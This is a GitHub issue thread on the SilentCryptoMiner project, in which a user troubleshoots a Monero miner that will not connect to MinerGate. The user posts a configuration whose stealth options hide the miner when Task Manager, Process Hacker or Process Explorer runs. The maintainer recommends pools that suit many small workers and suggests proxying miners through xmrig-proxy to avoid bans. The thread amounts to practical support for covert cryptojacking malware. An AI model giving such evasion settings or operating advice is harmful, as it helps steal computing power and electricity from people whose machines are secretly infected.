### ISSUE TITLE
Doesn't mine Monero on Minergate

### ISSUE THREAD

**Issue by Vamaka12** [UnamSanctam/SilentCryptoMiner#683]
I've tried bunch of configs but none of them work, Minergate just shows Status: OFFLINE (No active workers).
I was waiting 5-10 minutes
With other miner 1 minute and less was enough

```
Not run as Administrator, only non-administrator miners can be searched for.

Watchdog Running: Yes

Miners:

--algo=rx/0 --randomx-no-rdmsr --url=xmr.pool.minergate.com:45700 --user=EMAIL@gmail.com --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --cinit-idle-wait=5 --cinit-idle-cpu=80

GPUs:

 NVIDIA GeForce GTX 1060

Compatible GPU found: True
```
```
{
    "algo": "rx/0",
    "pool": "xmr.pool.minergate.com",
    "port": 45700,
    "wallet": "EMAIL@gmail.com",
    "password": "",
    "nicehash": false,
    "ssltls": false,
    "max-cpu": 20,
    "idle-wait": 5,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""
}
```

![image](https://user-images.githubusercontent.com/71032898/166095189-0a03a27b-05bf-4816-b373-e53dfc0340dc.png)

Also, I launched it without Stealth setting and It doesn't uses cpu
![image](https://user-images.githubusercontent.com/71032898/166100409-1c2861ba-be01-494b-9968-53e1c5bcb1ba.png)

Please help

**Comment by UnamSanctam** [comment]
Don't use MinerGate, they have garbage servers and steals hashrate, even the xmrig dev advices against it. You could try 2miners, MoneroOcean or nanopool.

**Comment by Vamaka12** [comment]
@UnamSanctam I will try nanopool now, Thanks!

**Comment by Werlrlivx** [comment]
nanopool does have a bigger minimum payout than the others mentioned if u have small amounts of workers i recommend u dont use it

**Comment by Vamaka12** [comment]
@Werlrlivx What about hashvault, and MoneroOcean ?

**Comment by UnamSanctam** [comment]
Don't use HashVault, they ban you if you have many small workers so you'd have to setup your own xmrig-proxy and proxy all your miners through that, both 2miners and MoneroOcean have quite low minimum payout thresholds so you can try either. Usually 2miners is more popular for newer miners though since their statistics can be easier to look at.

**Comment by Vamaka12** [comment]
@UnamSanctam Okay thank you
